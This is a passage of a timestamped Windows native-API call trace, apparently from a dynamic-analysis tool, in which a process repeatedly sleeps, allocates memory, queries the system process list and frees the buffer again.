NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.499] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.515] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.529] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.545] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.561] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.578] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.595] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.607] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.623] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.639] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.654] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.670] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.687] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.700] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.716] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.732] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.747] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.763] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.782] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.794] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.815] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 